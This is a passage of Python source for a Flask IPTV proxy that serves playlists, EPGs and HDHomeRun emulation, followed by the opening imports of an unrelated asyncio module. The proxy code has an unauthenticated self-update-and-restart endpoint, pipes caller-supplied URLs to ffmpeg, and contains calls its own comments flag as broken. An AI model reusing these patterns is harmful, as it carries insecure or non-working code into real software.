<b>2 Delete proxysettings.json</b> (only if you're coming from an older version of sstvproxy)</br>
<blockquote><i>sudo rm /home/USERNAME/Desktop/sstv/proxysettings.json</i></blockquote></br>
</br>
<b>3 Install ffmpeg:</b></br>
<blockquote><i>sudo apt install ffmpeg jq</i></blockquote></br>
</br>
<b>4 Install tvheadend:</b></br>
<blockquote><i>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 379CE192D401AB61 </i></blockquote></br>
<blockquote><i>echo "deb https://dl.bintray.com/tvheadend/deb xenial release-4.2" | sudo tee -a /etc/apt/sources.list</i></blockquote></br>
<blockquote><i>sudo apt-get update</i></blockquote></br>
<blockquote><i>sudo apt-get install tvheadend</i></blockquote></br>
You will need to enter a username and password to manage tvheadend as part of this install process.</br>
Check for the presence of /usr/bin/tv_find_grabbers If it doesnt exist then run:</br>
<blockquote><i>"apt-get install xmltv-util" </i></blockquote></br>
</br>
<b>5 Run sstvProxy:</b></br>
<blockquote><i>sudo chmod +x /home/USERNAME/Desktop/sstv/sstvProxy </i></blockquote></br>
<blockquote><i>sudo /home/USERNAME/Desktop/sstv/sstvProxy tvh</i></blockquote> <i>note the 'tvh' switch will enable it to scan all 150 channels</i></br>
Go through the setup steps, this will also setup the internal EPG grabber for TVHeadend</br>
</br>
<b>6 Restart TVHeadend:</b></br>
<blockquote><i>systemctl stop tvheadend </i></blockquote></br>
<blockquote><i>systemctl start tvheadend </i></blockquote></br>
</br>
<b>7 Configure TVHeadend:</b></br>
On your Ubuntu server browse <blockquote><i>http://127.0.0.1:9981</i></blockquote></br>
Use the username and password you set in Step 4</br>
</br>
Configuration -> Channel / EPG -> EPG Grabber Modules</br>
On the left side, highlight 'Internal: XMLTV: SmoothstreamsTV'</br>
On the right side, tick 'Enabled'</br>
Click 'Save'</br>
Configuration -> DVB Inputs -> Networks</br>
Click 'Add'</br>
Type = IPTV Automatic Network</br>
Network Name = SmoothstreamsTV</br>
URL = http://127.0.0.1:99/sstv/tvh.m3u8</br>
Maximum # input streams = 3</br>
Click Create</br>
Click Force Scan if it doesn't start scanned for muxes - wait for all the muxes to be scanned - there are 150 channels</br>
Go to the 'Services' tab</br>
Map Services -> Map all services</br>
</br>
Configuration -> Channel / EPG -> EPG Grabber Modules</br>
Click the button labeled 'Re-run Internal EPG Grabbers'</br>
**This will take a while to process** View the log down the bottom of the page. After it has run you should now see the channels in the EPG.</br>
<b>8 Restart sstvProxy:</b></br>
<blockquote><i>sudo /home/USERNAME/Desktop/sstv/sstvProxy</i></blockquote> <i>note no 'tvh' switch this time</i></p>""")
        html.write("<h2>Advanced Settings</h2>")
        html.write("""<p>
You can have as many or as few as you want and the file itself is optional. If you don't care for the option then don't even include it in the file, just delete it.</br></br>
There now exists an advanced settings example file on git. If this is in the same folder as the proxy it will detect it on launch and parse any settings that are within. </br></br>
Currently the accepted settings are:</br>
Custom ffmpeg locations "ffmpegloc":"C:\\ffmpeg\\bin\\ffmpeg.exe" (note the double slashes)</br>
Custom kodi control username "kodiuser":"string"</br>
Custom kodi control password "kodipass":"string"</br>
</br>
If you want to output a playlist that combines the SSTV channels with another playlist you already have then these options are for you:</br>
A url source for the above "extram3u8url":"url/string"</br>
A group name for the above, in order to filter between them in client "extram3u8name":"string"</br>
A file source for the above, url has priority though "extram3u8file":"path/string"</br>
</br>
If you want to output an EPG that combines the SSTV channels with another EPG you already have then:</br>
A url source for the above "extraxmlurl":"url/string"</br>
</br>
If you wish to use feed YAP into TVH and then TVH into Plex use the below:</br>
TVH url you use "tvhaddress": "127.0.0.1"</br>
username "tvhuser": ""</br>
password "tvhpass": ""</br>
</br>
If you want to override the EPG with your own one then:</br>
A url source for the epg "overridexml":"url/string"</p>""")
        html.write(footer)
        html.write("</body></html>\n")
def close_menu(restart):
    """Write ./cache/close.html confirming that settings were saved.

    Args:
        restart: True when the bind IP/port changed, in which case the page
            asks the user to restart instead of listing the output URLs.
    """
    with open("./cache/close.html", "w") as html:
        html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
        html.write("<h1>Data Saved</h1>")
        if restart:
            # BUGFIX: message read "You have change either..."; wording now
            # matches the equivalent log line emitted by handle_data.
            html.write("<h1>You have changed either the IP or Port, please restart this program.</h1>")
        else:
            html.write("<p>m3u8 url is %s/playlist.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>kodi m3u8 url is %s/kodi.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>EPG url is %s/epg.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>Sports EPG url is %s/sports.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>Plex Live TV url is %s</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>TVHeadend network url is %s/tvh.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>External m3u8 url is %s/external.m3u8</p>" % urljoin(EXT_HOST, SERVER_PATH))
            html.write("<p>Combined m3u8 url is %s/combined.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>Combined epg url is %s/combined.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            html.write("<p>Static m3u8 url is %s/static.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
            if TVHREDIRECT == True:
                html.write("<p>TVH's own EPG url is http://%s:9981/xmltv/channels</p>" % TVHURL)
        html.write("</body></html>\n")
def restart_program():
    """Relaunch YAP in a fresh process and terminate the current one.

    Windows cannot os.execv a path containing spaces
    (https://bugs.python.org/issue19066), so a new subprocess is spawned
    there; on other platforms the current process image is replaced.
    """
    os.system('cls' if os.name == 'nt' else 'clear')
    args = sys.argv[:]
    print(args)
    # logger.info('Re-spawning %s' % ' '.join(args))
    # #
    # # args.insert(0, sys.executable)
    # # if sys.platform == 'win32':
    # # args = ['"%s"' % arg for arg in args]
    #
    # os.execl(sys.executable, *([sys.executable] + sys.argv))
    logger.info("YAP is restarting...")
    FULL_PATH = sys.argv[0]
    exe = sys.executable
    # Rebuild the command line: interpreter, script path, original arguments.
    args = [exe, FULL_PATH]
    args += sys.argv[1:]
    # Separate out logger so we can shutdown logger after
    logger.info('Restarting YAP with %s', args)
    # os.execv fails with spaced names on Windows
    # https://bugs.python.org/issue19066
    if os.name == 'nt':
        subprocess.Popen(args, cwd=os.getcwd())
    else:
        os.execv(exe, args)
    # Only reached on the Windows path; the execv branch never returns.
    os._exit(0)
    # os.execv(sys.executable, args)
############################################################
# CLIENT <-> SSTV BRIDGE
############################################################
@app.route('/sstv/handle_data', methods=['POST'])
def handle_data():
    """Process the settings/restart forms posted from the generated pages.

    Three cases, selected by the posted fields and the referring page:
    * 'restart' present: optionally self-update first (value '2' pulls the
      master build, '3' the dev branch), then relaunch the process.
    * referrer is adv_channels.html: persist the advanced settings JSON
      and reload it.
    * otherwise: persist the basic settings, update the module globals,
      rebuild both playlists and write the confirmation page.
    """
    request_page = request.referrer
    config = {}
    inc_data = request.form
    if 'restart' in inc_data:
        if inc_data["restart"] == '3':
            logger.info('Updating YAP Dev')
            newfilename = ntpath.basename(latestfile)
            devname = latestfile.replace('master', 'dev')
            # NOTE(review): 'requests' appears to be urllib.request aliased at
            # the top of the file (urlretrieve is a urllib API) - confirm.
            requests.urlretrieve(devname, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
        elif inc_data["restart"] == '2':
            logger.info('Updating YAP')
            newfilename = ntpath.basename(latestfile)
            requests.urlretrieve(latestfile, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
        logger.info('Restarting YAP')
        restart_program()
        # Never reached on POSIX (restart_program execs a new image).
        return
    if request_page.endswith("adv_channels.html"):
        logger.info("Received new adv settings from %s", request.environ.get('REMOTE_ADDR'))
        restartrequired = False
        with open('./advancedsettings.json', 'w') as fp:
            dump(inc_data, fp)
        adv_settings()
        logger.info("Updated adv Settings file.")
    else:
        logger.info("Received new settings from %s", request.environ.get('REMOTE_ADDR'))
        global playlist, kodiplaylist, QUAL, QUALLIMIT, USER, PASS, SRVR, SITE, STRM, LISTEN_IP, LISTEN_PORT, EXTIP, EXT_HOST, SERVER_HOST, EXTPORT
        config["username"] = inc_data['Username']
        config["password"] = inc_data['Password']
        config["stream"] = inc_data['Stream']
        # Map the human-readable dropdown labels back to their internal codes.
        for sub in serverList:
            if sub[0] == inc_data['Server']:
                config["server"] = sub[1]
        for sub in providerList:
            if sub[0] == inc_data['Service']:
                config["service"] = sub[1]
        for sub in qualityList:
            if sub[0] == inc_data['Quality']:
                config["quality"] = sub[1]
        config["ip"] = inc_data['IP']
        config["port"] = int(inc_data['Port'])
        config["externalip"] = inc_data['ExternalIP']
        config["externalport"] = inc_data['ExternalPort']
        QUAL = config["quality"]
        USER = config["username"]
        PASS = config["password"]
        SRVR = config["server"]
        SITE = config["service"]
        STRM = config["stream"]
        # A new bind address/port only takes effect after a process restart,
        # so compare before overwriting the globals.
        if LISTEN_IP != config["ip"] or LISTEN_PORT != config["port"]:
            restartrequired = True
        else:
            restartrequired = False
        LISTEN_IP = config["ip"]
        LISTEN_PORT = config["port"]
        EXTIP = config["externalip"]
        EXTPORT = config["externalport"]
        EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
        SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
        with open('./proxysettings.json', 'w') as fp:
            dump(config, fp)
        logger.info("Updated Settings file.")
    check_token()
    playlist = build_playlist(SERVER_HOST)
    kodiplaylist = build_kodi_playlist()
    if restartrequired:
        logger.info("You have changed either the IP or Port, please restart this program.")
        close_menu(True)
    else:
        close_menu(False)
    return redirect(request_page, code=302)
    # return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'close.html')
@app.route('/')
@app.route('/sstv')
def landing_page():
    """Regenerate the cached HTML pages and serve the index page."""
    logger.info("Index was requested by %s", request.environ.get('REMOTE_ADDR'))
    create_menu()
    cache_dir = os.path.join(os.path.dirname(sys.argv[0]), 'cache')
    return send_from_directory(cache_dir, 'index.html')
@app.route('/<request_file>')
def index(request_file):
    """Serve the HDHomeRun discovery files requested at the site root."""
    logger.info("%s requested by %s at root" % (request_file, request.environ.get('REMOTE_ADDR')))
    requested = request_file.lower()
    if requested == 'lineup_status.json':
        return status()
    if requested == 'discover.json':
        return discover()
    if requested == 'lineup.json':
        return lineup(chan_map)
    if requested == 'lineup.post':
        return lineup_post()
    # logger.debug(request.headers)
    if requested == 'device.xml':
        return device()
    if requested == 'favicon.ico':
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
    # Any other filename falls through and returns None, as before.
@app.route('/%s/<request_file>' % SERVER_PATH)
def bridge(request_file):
    """Catch-all route under SERVER_PATH.

    Dispatches on the requested file name to serve playlists (m3u8/xspf),
    EPG XML files, icons, menu pages, individual channel streams, and the
    HDHomeRun emulation files used by Plex Live TV.
    """
    global playlist, token, chan_map, kodiplaylist, tvhplaylist, fallback
    check_token()
    # Identify the player from its User-Agent so a compatible return type
    # (redirect / file / inline playlist) can be chosen later.
    try:
        client = find_client(request.headers['User-Agent'])
    except:
        logger.debug("No user-agent provided by %s", request.environ.get('REMOTE_ADDR'))
        client = 'unk'
    # XSPF playlist
    if request_file.lower().endswith('.xspf'):
        playlist = build_xspf(SERVER_HOST, request_file)
        logger.info("XSPF playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        return Response(playlist, mimetype='application/xspf+xml')
    # return epg
    if request_file.lower().startswith('epg.'):
        logger.info("EPG was requested by %s", request.environ.get('REMOTE_ADDR'))
        if not fallback:
            dl_epg()
        else:
            # fallback set at startup when the primary guide source failed
            logger.exception("EPG build, EPG download failed. Trying SSTV.")
            dl_epg(2)
        with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'epg.xml'), 'r+') as f:
            content = f.read()
        response = Response(content, mimetype='text/xml')
        # CORS headers so browser-based players can fetch the EPG.
        headers = dict(response.headers)
        headers.update(
            {"Access-Control-Expose-Headers": "Accept-Ranges, Content-Encoding, Content-Length, Content-Range",
             "Access-Control-Allow-Origin": "*", "Access-Control-Allow-Headers": "Range",
             "Access-Control-Allow-Methods": "GET, POST, OPTIONS, HEAD"})
        response.headers = headers
        return response
    # return sports only epg
    if request_file.lower() == 'sports.xml':
        logger.info("Sports EPG was requested by %s", request.environ.get('REMOTE_ADDR'))
        if not fallback:
            dl_epg()
        else:
            logger.exception("Sports EPG build, EPG download failed. Trying SSTV.")
            dl_epg(2)
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'sports.xml')
    # return combined epg
    if request_file.lower() == 'combined.xml':
        logger.info("Combined EPG was requested by %s", request.environ.get('REMOTE_ADDR'))
        if not fallback:
            dl_epg()
        else:
            logger.exception("Combined EPG build, EPG download failed. Trying SSTV.")
            dl_epg(2)
        # Merge the external EPG into the combined file before serving.
        obtain_epg()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'combined.xml')
    # return icons
    elif request_file.lower().endswith('.png'):
        logger.debug("Icon %s was requested by %s" % (request_file, request.environ.get('REMOTE_ADDR')))
        try:
            return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), request_file)
        except:
            # Missing icon: serve a transparent placeholder instead of 404.
            return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
    elif request_file.lower() == 'favicon.ico':
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
    # return main menu
    elif request_file.lower().startswith('index'):
        logger.info("Index was requested by %s", request.environ.get('REMOTE_ADDR'))
        create_menu()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'index.html')
    # return settings menu
    elif request_file.lower().startswith('settings'):
        logger.info("Settings was requested by %s", request.environ.get('REMOTE_ADDR'))
        create_menu()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'settings.html')
    # return settings menu
    elif request_file.lower().startswith('adv'):
        logger.info("Adv_Settings was requested by %s", request.environ.get('REMOTE_ADDR'))
        create_menu()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'adv_settings.html')
    # return channels menu
    elif request_file.lower().startswith('channels'):
        logger.info("Channels was requested by %s", request.environ.get('REMOTE_ADDR'))
        create_menu()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'channels.html')
    # return howto menu
    elif request_file.lower().startswith('howto'):
        logger.info("Howto was requested by %s", request.environ.get('REMOTE_ADDR'))
        create_menu()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'howto.html')
    # kodi static refresh
    elif request_file.lower().startswith('refresh'):
        # kodi force rescan 423-434
        logger.info("Refresh was requested by %s", request.environ.get('REMOTE_ADDR'))
        load_token()
        check_token()
        rescan_channels()
        return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
    # returns static playlist
    elif request_file.lower().startswith('static'):
        staticplaylist = build_static_playlist()
        logger.info("Static playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        return Response(staticplaylist, mimetype='application/x-mpegURL')
    # returns test playlist
    elif request_file.lower() == "test.m3u8":
        testplaylist = build_test_playlist([SERVER_HOST, EXT_HOST])
        logger.info("Static playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        return Response(testplaylist, mimetype='application/x-mpegURL')
    # returns kodi playlist
    elif request_file.lower().startswith('kodi'):
        kodiplaylist = build_kodi_playlist()
        logger.info("Kodi channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        return Response(kodiplaylist, mimetype='application/x-mpegURL')
    # returns combined playlist
    elif request_file.lower() == 'combined.m3u8':
        extraplaylist = build_playlist(SERVER_HOST) + obtain_m3u8()
        logger.info("Combined channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        logger.info("Sending playlist to %s", request.environ.get('REMOTE_ADDR'))
        return Response(extraplaylist, mimetype='application/x-mpegURL')
    # returns external playlist
    elif request_file.lower().startswith('external'):
        extplaylist = build_playlist(EXT_HOST)
        logger.info("External channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        return Response(extplaylist, mimetype='application/x-mpegURL')
    # returns tvh playlist
    elif request_file.lower().startswith('tvh'):
        tvhplaylist = build_tvh_playlist()
        logger.info("TVH channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
        return Response(tvhplaylist, mimetype='application/x-mpegURL')
    elif request_file.lower() == 'playlist.m3u8' or request_file.lower().startswith('ch'):
        # returning Dynamic channels
        if request.args.get('ch') or request_file.lower().startswith('ch'):
            # Channel may arrive either as chNN.m3u8 or as ?ch=NN; either way
            # normalise to a zero-padded two-digit string.
            if request_file.lower().startswith('ch'):
                chan = request_file.lower().replace("ch", "").replace(".m3u8", "")
                sanitized_channel = "{:02.0f}".format(int(chan))
            else:
                chan = request.args.get('ch')
                sanitized_channel = ("0%d" % int(request.args.get('ch'))) if int(
                    request.args.get('ch')) < 10 else request.args.get('ch')
            check_token()
            if SITE == 'vaders':
                logger.info("Channel %s playlist was requested by %s", sanitized_channel,
                            request.environ.get('REMOTE_ADDR'))
                vaders_url = "http://vapi.vaders.tv/play/{0}.{1}?"
                tokenDict = {"username": "vsmystreams_" + USER, "password": PASS}
                jsonToken = json.dumps(tokenDict)
                tokens = base64.b64encode(jsonToken.encode('utf-8'))
                strm = 'ts' if STRM == 'mpegts' else 'm3u8'
                if request.args.get('strm'):
                    strm = request.args.get('strm')
                # NOTE(review): str() of the base64 bytes yields "b'...'";
                # [1:] strips the 'b' but keeps the quotes — presumably what
                # the upstream API expects; verify against the vaders API.
                tokens = urllib.parse.urlencode({"token":str(tokens)[1:]})
                if int(chan) > 150:
                    channel = chan
                else:
                    channel = vaders_channels[chan]
                channel_url = vaders_url.format(channel, strm) + tokens
                print(channel_url)
                return redirect(channel_url, code=302)
            # Quality defaults to 1; user override, otherwise QUAL for
            # channels at or below QUALLIMIT.
            qual = 1
            if request.args.get('qual'):# and int(sanitized_channel) <= QUALLIMIT:
                qual = request.args.get('qual')
            elif int(sanitized_channel) <= QUALLIMIT:
                qual = QUAL
            if request.args.get('strm') and request.args.get('strm') == 'rtmp':
                strm = 'rtmp'
                rtmpTemplate = 'rtmp://{0}.smoothstreams.tv:3625/{1}/ch{2}q{3}.stream?wmsAuthSign={4}'
                pure_url = rtmpTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
                output_url = rtmpTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
            elif request.args.get('strm') and request.args.get('strm') == 'mpegts':
                strm = 'mpegts'
                # mpegts is served by piping ffmpeg through the auto() route.
                return auto(sanitized_channel, qual)
            else:
                strm = 'hls'
                hlsTemplate = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}=='
                pure_url = hlsTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
                output_url = pure_url
            # channel fixing for dead server/Quality
            if CHECK_CHANNEL and not checkChannelURL(pure_url) and strm == 'hls':
                output_url = fixURL(strm, sanitized_channel, qual, token['hash'])
            # creates the output playlist files and returns it as a variable as well
            if strm == 'hls':
                output_file = create_channel_file(output_url)
            logger.info("Channel %s playlist was requested by %s", sanitized_channel,
                        request.environ.get('REMOTE_ADDR'))
            # useful for debugging
            logger.debug("URL returned: %s" % output_url)
            # NOTE(review): request.args.get() returns a string, so the
            # numeric comparisons against 1/2/4 below never match for a
            # query-supplied type; only the default 3 behaves as an int.
            if request.args.get('type'):
                returntype = request.args.get('type')
            else:
                returntype = 3
            # different return types as different clients require it. Expect this to change as clients fail on certain things like dynamic hls
            if strm == 'rtmp' or request.args.get('response'):
                response = redirect(output_url, code=302)
                headers = dict(response.headers)
                headers.update({'Content-Type': 'application/x-mpegURL', "Access-Control-Allow-Origin": "*"})
                response.headers = headers
                logger.debug("returning response")
                return response
            elif returntype == 1 or client == 'kodi':
                # hlsTemplate = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}=='
                # ss_url = hlsTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
                # some players are having issues with http/https redirects
                logger.debug("returning hls url redirect")
                return redirect(output_url, code=302)
            elif returntype == 2 or client == 'vlc':
                logger.debug("returning m3u8 as file")
                return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'playlist.m3u8')
            elif returntype == 4:
                logger.debug("returning hls url")
                return output_url
            else:
                # some players are having issues with http/https redirects
                logger.debug("returning m3u8 as variable")
                return output_file
        # returning dynamic playlist
        else:
            playlist = build_playlist(SERVER_HOST)
            logger.info("All channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
            return Response(playlist, mimetype='application/x-mpegURL')
    # HDHomeRun emulated json files for Plex Live tv.
    elif request_file.lower() == 'lineup_status.json':
        return status()
    elif request_file.lower() == 'discover.json':
        return discover()
    elif request_file.lower() == 'lineup.json':
        if TVHREDIRECT == True:
            return tvh_lineup()
        else:
            return lineup(chan_map)
    elif request_file.lower() == 'lineup.post':
        return lineup_post()
    elif request_file.lower() == 'device.xml':
        return device()
    else:
        logger.info("Unknown requested %r by %s", request_file, request.environ.get('REMOTE_ADDR'))
        abort(404, "Unknown request")
@app.route('/tvh/<request_file>')
def tvh_returns(request_file):
    """Serve the HDHomeRun emulation endpoints rebranded for TVHeadend."""
    handlers = {
        'lineup_status.json': status,
        'discover.json': tvh_discover,
        'lineup.json': tvh_lineup,
        'lineup.post': lineup_post,
        'device.xml': tvh_device,
    }
    handler = handlers.get(request_file.lower())
    if handler is not None:
        return handler()
    logger.info("Unknown requested %r by %s", request_file, request.environ.get('REMOTE_ADDR'))
    abort(404, "Unknown request")
@app.route('/%s/auto/<request_file>' % SERVER_PATH)
# returns a piped stream, used for TVH/Plex Live TV
def auto(request_file, qual=""):
    """Pipe a channel through ffmpeg and stream it back as MPEG-TS.

    request_file -- channel id, optionally prefixed with 'v' (stripped).
    qual -- quality override; empty string means use the configured QUAL.
    """
    logger.debug("starting pipe function")
    check_token()
    channel = request_file.replace("v", "")
    logger.info("Channel %s playlist was requested by %s", channel,
                request.environ.get('REMOTE_ADDR'))
    # Zero-pad single-digit channel numbers.
    sanitized_channel = ("0%d" % int(channel)) if int(channel) < 10 else channel
    sanitized_qual = '1'
    # Quality selection only applies to channels at or below QUALLIMIT.
    if int(channel) <= QUALLIMIT:
        if qual == "":
            sanitized_qual = QUAL
        else:
            sanitized_qual = qual
    template = "https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}"
    url = template.format(SRVR, SITE, sanitized_channel, sanitized_qual, token['hash'])
    logger.debug(
        "sanitized_channel: %s sanitized_qual: %s QUAL: %s qual: %s" % (sanitized_channel, sanitized_qual, QUAL, qual))
    # Swap to a working server/quality if the chosen URL is dead.
    if CHECK_CHANNEL and not checkChannelURL(url):
        url = fixURL('hls', sanitized_channel, qual, token['hash'])
    logger.debug(url)
    # try:
    # urllib.request.urlopen(url, timeout=2).getcode()
    # except:
    # a = 1
    # except timeout:
    # #special arg for tricking tvh into saving every channel first time
    # print("timeout")
    # sanitized_channel = '01'
    # sanitized_qual = '3'
    # url = template.format(SRVR, SITE, sanitized_channel,sanitized_qual, token['hash'])
    if args.tvh:
        # Force channel 01 quality 3 so TVHeadend saves every channel on
        # its first scan.
        logger.debug("TVH Trickery happening")
        sanitized_channel = '01'
        sanitized_qual = '3'
        url = template.format(SRVR, SITE, sanitized_channel, sanitized_qual, token['hash'])
        logger.debug(url)
    if request.args.get('url'):
        logger.info("Piping custom URL")
        url = request.args.get('url')
        if '|' in url:
            # Strip a Kodi-style "|headers" suffix from the URL.
            url = url.split('|')[0]
    logger.debug(url)
    import subprocess

    def generate():
        # Spawn ffmpeg copying the stream to stdout and yield it in chunks.
        logger.debug("starting generate function")
        cmdline = list()
        cmdline.append(FFMPEGLOC)
        cmdline.append("-i")
        cmdline.append(url)
        cmdline.append("-vcodec")
        cmdline.append("copy")
        cmdline.append("-acodec")
        cmdline.append("copy")
        cmdline.append("-f")
        cmdline.append("mpegts")
        cmdline.append("pipe:1")
        logger.debug(cmdline)
        FNULL = open(os.devnull, 'w')
        proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=FNULL)
        logger.debug("pipe started")
        try:
            f = proc.stdout
            byte = f.read(512)
            while byte:
                yield byte
                byte = f.read(512)
        finally:
            # Ensure ffmpeg dies when the client disconnects.
            proc.kill()

    return Response(response=generate(), status=200, mimetype='video/mp2t',
                    headers={'Access-Control-Allow-Origin': '*', "Content-Type": "video/mp2t",
                             "Content-Disposition": "inline", "Content-Transfer-Enconding": "binary"})
############################################################
# MAIN
############################################################
if __name__ == "__main__":
    # Startup sequence: load settings/token, build the channel map and
    # playlists, start background threads, print URLs, then run Flask.
    logger.info("Initializing")
    load_settings()
    if os.path.exists(TOKEN_PATH):
        load_token()
    check_token()
    fallback = False
    logger.info("Building initial playlist...")
    try:
        # fetch chan_map
        try:
            chan_map = build_channel_map()
        except:
            # cannot get response from fog, resorting to fallback
            fallback = True
            chan_map = build_channel_map_sstv()
        jsonGuide1 = getJSON("iptv.json", "https://iptvguide.netlify.com/iptv.json",
                             "https://fast-guide.smoothstreams.tv/altepg/feed1.json")
        jsonGuide2 = getJSON("tv.json", "https://iptvguide.netlify.com/tv.json",
                             "https://fast-guide.smoothstreams.tv/altepg/feedall1.json")
        playlist = build_playlist(SERVER_HOST)
        kodiplaylist = build_kodi_playlist()
        tvhplaylist = build_tvh_playlist()
        # Download icons, runs in sep thread, takes ~1min
        try:
            di = threading.Thread(target=dl_icons, args=(len(chan_map),))
            di.setDaemon(True)
            di.start()
        except (KeyboardInterrupt, SystemExit):
            sys.exit()
        dl_epg()
    except:
        logger.exception("Exception while building initial playlist: ")
        exit(1)
    # Python 2 exposes 'thread', Python 3 '_thread'; try both.
    try:
        thread.start_new_thread(thread_playlist, ())
    except:
        _thread.start_new_thread(thread_playlist, ())
    if AUTO_SERVER: testServers()
    print("\n\n##############################################################")
    print("Main Menu - %s/index.html" % urljoin(SERVER_HOST, SERVER_PATH))
    print("Contains all the information located here and more!")
    print("##############################################################\n\n")
    print("\n##############################################################")
    print("m3u8 url is %s/playlist.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
    print("kodi m3u8 url is %s/kodi.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
    print("EPG url is %s/epg.xml" % urljoin(SERVER_HOST, SERVER_PATH))
    print("Sports EPG url is %s/sports.xml" % urljoin(SERVER_HOST, SERVER_PATH))
    print("Plex Live TV url is %s" % urljoin(SERVER_HOST, SERVER_PATH))
    print("TVHeadend network url is %s/tvh.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
    print("External m3u8 url is %s/external.m3u8" % urljoin(EXT_HOST, SERVER_PATH))
    print("Combined m3u8 url is %s/combined.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
    print("Combined EPG url is %s/combined.xml" % urljoin(SERVER_HOST, SERVER_PATH))
    print("Static m3u8 url is %s/static.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
    print("TVH's own EPG url is http://%s:9981/xmltv/channels" % TVHURL)
    print("Static XSPF url is %s/static.xspf" % urljoin(SERVER_HOST, SERVER_PATH))
    print("Dynamic XSPF url is %s/playlist.xspf" % urljoin(SERVER_HOST, SERVER_PATH))
    print("##############################################################\n")
    if __version__ < latest_ver:
        # NOTE(review): 'type' below is the builtin, which renders as
        # "<class 'type'>" in the message — probably not what was intended.
        logger.info(
            "Your version (%s%s) is out of date, the latest is %s, which has now be downloaded for you into the 'updates' subdirectory." % (
                type, __version__, latest_ver))
        newfilename = ntpath.basename(latestfile)
        if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'updates')):
            os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'updates'))
        # NOTE(review): the requests library has no urlretrieve(); this line
        # would raise AttributeError — urllib.request.urlretrieve was
        # presumably intended. Confirm before relying on auto-update.
        requests.urlretrieve(latestfile, os.path.join(os.path.dirname(sys.argv[0]), 'updates', newfilename))
    else:
        logger.info("Your version (%s) is up to date." % (__version__))
    logger.info("Listening on %s:%d", LISTEN_IP, LISTEN_PORT)
    try:
        a = threading.Thread(target=thread_updater)
        a.setDaemon(True)
        a.start()
    except (KeyboardInterrupt, SystemExit):
        sys.exit()
    # debug causes it to load twice on initial startup and every time the script is saved, TODO disbale later
    try:
        app.run(host=LISTEN_IP, port=LISTEN_PORT, threaded=True, debug=False)
    except:
        os.system('cls' if os.name == 'nt' else 'clear')
        logger.exception("Proxy failed to launch, try another port")
    logger.info("Finished!")
|
_asyncio.py | import asyncio
import concurrent.futures
import math
import socket
import sys
from collections import OrderedDict, deque
from concurrent.futures import Future
from dataclasses import dataclass
from functools import wraps
from inspect import isgenerator
from socket import AddressFamily, SocketKind, SocketType
from threading import Thread
from types import TracebackType
from typing import (
Any, Awaitable, Callable, Coroutine, Deque, Dict, Generator, List, Optional, Sequence, Set,
Tuple, Type, TypeVar, Union, cast)
from weakref import WeakKeyDictionary
from .. import TaskInfo, abc
from .._core._eventloop import claim_worker_thread, threadlocals
from .._core._exceptions import (
BrokenResourceError, BusyResourceError, ClosedResourceError, EndOfStream)
from .._core._exceptions import ExceptionGroup as BaseExceptionGroup
from .._core._exceptions import WouldBlock
from .._core._sockets import GetAddrInfoReturnType, convert_ipv6_sockaddr
from .._core._synchronization import ResourceGuard
from ..abc.sockets import IPSockAddrType, UDPPacketType
